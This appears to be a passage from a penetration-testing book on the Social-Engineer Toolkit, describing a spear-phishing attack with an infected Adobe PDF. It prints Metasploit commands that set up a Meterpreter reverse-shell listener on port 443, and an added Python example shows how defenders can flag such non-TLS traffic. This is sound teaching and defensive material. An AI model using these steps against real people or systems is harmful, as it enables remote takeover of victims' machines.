
The Social-Engineer Toolkit


Finally, create a Metasploit listener for the payload to connect back to.

When SET launches Metasploit, it configures all the necessary options and 
starts to listen on your attacking IP address on port 443, as configured 

 Do you want to setup a listener yes or no: 


resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai
ENCODING => shikata_ga_nai
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.

 [*] Started reverse handler on

[*] Starting the payload handler...
msf exploit(handler) >
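
A defender's view of the listener above, as an added example that is not from the book: windows/meterpreter/reverse_tcp is a plain TCP payload, so a connection to a handler on port 443 does not open with a TLS ClientHello the way HTTPS traffic does. The flow record layout, field names, and addresses below are constructed assumptions.

```python
from dataclasses import dataclass

@dataclass
class Flow:
    src: str
    dst: str
    dst_port: int
    first_sender: str   # "client" or "server": who sent the first payload
    first_bytes: bytes  # first payload bytes seen on the flow

def looks_like_client_hello(data: bytes) -> bool:
    """True if data starts with a TLS handshake record carrying a ClientHello."""
    return (
        len(data) >= 6
        and data[0] == 0x16   # record type: handshake
        and data[1] == 0x03   # record version, major byte
        and data[2] <= 0x04   # record version, minor byte
        and data[5] == 0x01   # handshake type: ClientHello
    )

def suspicious_443(flows):
    """Return (flow, reason) for port-443 flows that do not start as TLS."""
    findings = []
    for f in flows:
        if f.dst_port != 443:
            continue
        if f.first_sender != "client":
            findings.append((f, "server sent the first payload"))
        elif not looks_like_client_hello(f.first_bytes):
            findings.append((f, "client payload is not a TLS ClientHello"))
    return findings

# Constructed sample flows (documentation address ranges, not from the page).
SAMPLE_FLOWS = [
    # Ordinary HTTPS: client opens with a TLS ClientHello.
    Flow("192.0.2.10", "198.51.100.5", 443, "client",
         bytes.fromhex("1603010200010001fc0303")),
    # Server speaks first with a non-TLS length-prefixed blob.
    Flow("192.0.2.11", "203.0.113.7", 443, "server",
         bytes.fromhex("00ac0b00")),
    # Cleartext HTTP sent to port 443.
    Flow("192.0.2.12", "203.0.113.8", 443, "client", b"GET / HTTP/1.1\r\n"),
    # Not port 443: out of scope for this check.
    Flow("192.0.2.13", "203.0.113.9", 80, "client", b"GET / HTTP/1.1\r\n"),
]

if __name__ == "__main__":
    for flow, reason in suspicious_443(SAMPLE_FLOWS):
        print(f"{flow.src} -> {flow.dst}:{flow.dst_port}: {reason}")
```
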

We’ve just set up an attack against , crafted an 
email to the recipient, and used an Adobe file format exploit. SET allowed 
us to create templates and have them dynamically imported when we use the 
tool. When the target opens the email and double-clicks the Adobe file, he’ll 
see something like Figure 10-1.

Figure 10-1: The target’s view of the infected PDF file